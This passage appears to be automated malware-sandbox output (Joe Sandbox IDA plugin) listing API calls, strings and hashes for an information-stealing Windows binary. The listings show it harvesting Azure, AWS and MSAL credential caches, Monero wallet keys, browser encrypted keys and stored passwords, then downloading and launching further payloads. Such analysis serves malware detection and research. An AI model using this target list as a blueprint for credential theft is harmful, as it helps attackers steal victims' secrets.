                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: 30dded79f7842c5bde37bff968bd509c72286896fdfa1f2b05d56d70213cacc1
                        • Instruction ID: b40cdb7f6ab98f5cabb93014c4a8fa172af3b76a8bfe821a14013c4b0fe0f548
                        • Opcode Fuzzy Hash: 30dded79f7842c5bde37bff968bd509c72286896fdfa1f2b05d56d70213cacc1
                        • Instruction Fuzzy Hash: 4BE1F971911108ABDB88FBE0DC92EEEB77AAF15300F50415EF10666191EF346E4ACF69
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • RegOpenKeyExA.ADVAPI32(00000000,0126C058,00000000,00020019,00000000,006B05B6), ref: 006A83A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006A8426
                        • wsprintfA.USER32 ref: 006A8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 006A847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 006A848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 006A8499
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: 2b11265214b54593bc9a213b9092886ae27288dff94e492ec1fd11f57fe41f2d
                        • Instruction ID: fadc0fbe4fe1e44b6edd13b6b4d1ef64e57e55f91ec3e90f31ecd1ecab1e8c42
                        • Opcode Fuzzy Hash: 2b11265214b54593bc9a213b9092886ae27288dff94e492ec1fd11f57fe41f2d
                        • Instruction Fuzzy Hash: CE811F719111189FEB68EB50CC95FEA77B9FF08700F108299E109A6180DF75AF85CF95
                        APIs
                          • Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 006A4DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 006A4DCD
                          • Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A492C
                          • Part of subcall function 006A4910: FindFirstFileA.KERNEL32(?,?), ref: 006A4943
                        • lstrcat.KERNEL32(?,00000000), ref: 006A4E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 006A4E59
                          • Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FDC), ref: 006A4971
                          • Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FE0), ref: 006A4987
                          • Part of subcall function 006A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 006A4B7D
                          • Part of subcall function 006A4910: FindClose.KERNEL32(000000FF), ref: 006A4B92
                        • lstrcat.KERNEL32(?,00000000), ref: 006A4EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 006A4EE5
                          • Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A49B0
                          • Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B08D2), ref: 006A49C5
                          • Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A49E2
                          • Part of subcall function 006A4910: PathMatchSpecA.SHLWAPI(?,?), ref: 006A4A1E
                          • Part of subcall function 006A4910: lstrcat.KERNEL32(?,0126F990), ref: 006A4A4A
                          • Part of subcall function 006A4910: lstrcat.KERNEL32(?,006B0FF8), ref: 006A4A5C
                          • Part of subcall function 006A4910: lstrcat.KERNEL32(?,?), ref: 006A4A70
                          • Part of subcall function 006A4910: lstrcat.KERNEL32(?,006B0FFC), ref: 006A4A82
                          • Part of subcall function 006A4910: lstrcat.KERNEL32(?,?), ref: 006A4A96
                          • Part of subcall function 006A4910: CopyFileA.KERNEL32(?,?,00000001), ref: 006A4AAC
                          • Part of subcall function 006A4910: DeleteFileA.KERNEL32(?), ref: 006A4B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 5ded770d55aea13f3d02be5a13f93cdd10ebbd19621a03937e94199eb8e9b4c8
                        • Instruction ID: 95dbc7ee6eac6b6e5ab441f3d4a3ff7cc5fd36b0707314fa3923c326303eda7d
                        • Opcode Fuzzy Hash: 5ded770d55aea13f3d02be5a13f93cdd10ebbd19621a03937e94199eb8e9b4c8
                        • Instruction Fuzzy Hash: 3141E5BA94020867CB94F770EC57FEE3339AB25700F404558B645660C1EEB45BC9CB92
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 006A906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 6eedc87894d89ef17a04742f8429cb064e9c76a03fa72d4149122b0a036064e1
                        • Instruction ID: d252a65544ac0f8cf958928352432320c436f6f4f657f158366db5422b8895e7
                        • Opcode Fuzzy Hash: 6eedc87894d89ef17a04742f8429cb064e9c76a03fa72d4149122b0a036064e1
                        • Instruction Fuzzy Hash: FE71EFB5910208ABDB08EFE4DD89FEEB7B9BF49700F208619F515A7290DB349905CF61
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006A31C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006A335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006A34EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: c1e694ef7772747fd3d1c0c162d6ef3a70b02ba35c5474f84cad56e763ec0070
                        • Instruction ID: 277d234c00d6db6b5e484594ab40a673fc0bbb239ad60033b4e4f0390cfbfc4c
                        • Opcode Fuzzy Hash: c1e694ef7772747fd3d1c0c162d6ef3a70b02ba35c5474f84cad56e763ec0070
                        • Instruction Fuzzy Hash: 0612ED718101089ADB89FBE0DC92EEEB77AAF15300F50415EF50666192EF346F4ACF5A
                        APIs
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 00696280: InternetOpenA.WININET(006B0DFE,00000001,00000000,00000000,00000000), ref: 006962E1
                          • Part of subcall function 00696280: StrCmpCA.SHLWAPI(?,0126FA00), ref: 00696303
                          • Part of subcall function 00696280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00696335
                          • Part of subcall function 00696280: HttpOpenRequestA.WININET(00000000,GET,?,0126F1C0,00000000,00000000,00400100,00000000), ref: 00696385
                          • Part of subcall function 00696280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006963BF
                          • Part of subcall function 00696280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006963D1
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A5318
                        • lstrlen.KERNEL32(00000000), ref: 006A532F
                          • Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 006A5364
                        • lstrlen.KERNEL32(00000000), ref: 006A5383
                        • lstrlen.KERNEL32(00000000), ref: 006A53AE
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: d14bb9bfaa14d7c4ae7e94d288abad96c098878f6538f754dcc917ea1f6a337b
                        • Instruction ID: b9d74ebf1c058a32c689acbd6461740430be0a4882e8e1e2bdfd0bd540779723
                        • Opcode Fuzzy Hash: d14bb9bfaa14d7c4ae7e94d288abad96c098878f6538f754dcc917ea1f6a337b
                        • Instruction Fuzzy Hash: 29510C709111489BCB98FFA0C992AEE777AAF12301F50401DF9075A591DF34AF46CF66
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: c10f1478afc6c3aae87ce0f4f14b1e9955f1d058e3e18149da59aff646d348c8
                        • Instruction ID: 91223af96eb14f62322632c25ba0b2ec5a67ebcdd49790cfc1f391ba89cafcb7
                        • Opcode Fuzzy Hash: c10f1478afc6c3aae87ce0f4f14b1e9955f1d058e3e18149da59aff646d348c8
                        • Instruction Fuzzy Hash: 67C1B3B59011089BCB58FFA0DC89FEA777ABF55300F10459DE50AA7241EB30AE85CF95
                        APIs
                          • Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 006A42EC
                        • lstrcat.KERNEL32(?,0126F580), ref: 006A430B
                        • lstrcat.KERNEL32(?,?), ref: 006A431F
                        • lstrcat.KERNEL32(?,0126E5E0), ref: 006A4333
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006A8D90: GetFileAttributesA.KERNEL32(00000000,?,00691B54,?,?,006B564C,?,?,006B0E1F), ref: 006A8D9F
                          • Part of subcall function 00699CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00699D39
                          • Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
                          • Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
                          • Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
                          • Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,0069148F,00000000), ref: 00699A5A
                          • Part of subcall function 006999C0: LocalFree.KERNEL32(0069148F), ref: 00699A90
                          • Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A
                          • Part of subcall function 006A93C0: GlobalAlloc.KERNEL32(00000000,006A43DD,006A43DD), ref: 006A93D3
                        • StrStrA.SHLWAPI(?,0126F658), ref: 006A43F3
                        • GlobalFree.KERNEL32(?), ref: 006A4512
                          • Part of subcall function 00699AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699AEF
                          • Part of subcall function 00699AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00694EEE,00000000,?), ref: 00699B01
                          • Part of subcall function 00699AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699B2A
                          • Part of subcall function 00699AC0: LocalFree.KERNEL32(?,?,?,?,00694EEE,00000000,?), ref: 00699B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 006A44A3
                        • StrCmpCA.SHLWAPI(?,006B08D1), ref: 006A44C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 006A44D2
                        • lstrcat.KERNEL32(00000000,?), ref: 006A44E5
                        • lstrcat.KERNEL32(00000000,006B0FB8), ref: 006A44F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: the same fourteen memory dumps (00690000 through 00D28000) listed under the first function entry above
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: 410a6937c5537eeca110dc68e09a7e5514c565f48e719a1b98c88fc9aa847831
                        • Instruction ID: c57efa390a197b70e763b0f850d85a44cb7bf272a70a5982262b18324e70ddf5
                        • Opcode Fuzzy Hash: 410a6937c5537eeca110dc68e09a7e5514c565f48e719a1b98c88fc9aa847831
                        • Instruction Fuzzy Hash: 6A7151B6900208ABCB54FBE4DC85FEE73BABB89300F00459DE60597181EA74DB45CFA5
                        APIs
                          • Part of subcall function 006912A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006912B4
                          • Part of subcall function 006912A0: RtlAllocateHeap.NTDLL(00000000), ref: 006912BB
                          • Part of subcall function 006912A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006912D7
                          • Part of subcall function 006912A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006912F5
                          • Part of subcall function 006912A0: RegCloseKey.ADVAPI32(?), ref: 006912FF
                        • lstrcat.KERNEL32(?,00000000), ref: 0069134F
                        • lstrlen.KERNEL32(?), ref: 0069135C
                        • lstrcat.KERNEL32(?,.keys), ref: 00691377
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006A8B60: GetSystemTime.KERNEL32(006B0E1A,0126B828,006B05AE,?,?,006913F9,?,0000001A,006B0E1A,00000000,?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006A8B86
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00691465
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
                          • Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
                          • Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
                          • Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,0069148F,00000000), ref: 00699A5A
                          • Part of subcall function 006999C0: LocalFree.KERNEL32(0069148F), ref: 00699A90
                          • Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 006914EF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: the same fourteen memory dumps (00690000 through 00D28000) listed under the first function entry above
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: 7423cf1bf8ae06c9dd7c8f0a8a36adcdeab3171312f416a541f2689d02ced2e6
                        • Instruction ID: 248b9b7b8b6391193d7080814fe1a2fdcd10157b130458576b9cfb4c538efeb5
                        • Opcode Fuzzy Hash: 7423cf1bf8ae06c9dd7c8f0a8a36adcdeab3171312f416a541f2689d02ced2e6
                        • Instruction Fuzzy Hash: 475133B19501195BCB95FB60DC92BEE737DAF55300F40419DB60A62082EF345F86CFAA
                        APIs
                          • Part of subcall function 006972D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0069733A
                          • Part of subcall function 006972D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006973B1
                          • Part of subcall function 006972D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0069740D
                          • Part of subcall function 006972D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00697452
                          • Part of subcall function 006972D0: HeapFree.KERNEL32(00000000), ref: 00697459
                        • lstrcat.KERNEL32(00000000,006B17FC), ref: 00697606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00697648
                        • lstrcat.KERNEL32(00000000, : ), ref: 0069765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0069768F
                        • lstrcat.KERNEL32(00000000,006B1804), ref: 006976A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 006976D3
                        • lstrcat.KERNEL32(00000000,006B1808), ref: 006976ED
                        • task.LIBCPMTD ref: 006976FB
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: the same fourteen memory dumps (00690000 through 00D28000) listed under the first function entry above
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                        • String ID: :
                        • API String ID: 2677904052-3653984579
                        • Opcode ID: ede245171b1d281a2f5d190b505589573632778b459da7ebcb4089bfa7d2501b
                        • Instruction ID: c3123ef73875bd808befab46a7b5bbcd4a91817804b2a14e499f7fa7c41b3544
                        • Opcode Fuzzy Hash: ede245171b1d281a2f5d190b505589573632778b459da7ebcb4089bfa7d2501b
                        • Instruction Fuzzy Hash: 44316B71902109EFCF48EBB4EC99DFE737EBB55301F244219E502A72A0DA34E942DB55
                        APIs
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 006947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
                          • Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849
                        • InternetOpenA.WININET(006B0DF7,00000001,00000000,00000000,00000000), ref: 0069610F
                        • StrCmpCA.SHLWAPI(?,0126FA00), ref: 00696147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0069618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006961B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 006961DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0069620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00696249
                        • InternetCloseHandle.WININET(?), ref: 00696253
                        • InternetCloseHandle.WININET(00000000), ref: 00696260
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: the same fourteen memory dumps (00690000 through 00D28000) listed under the first function entry above
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Similarity
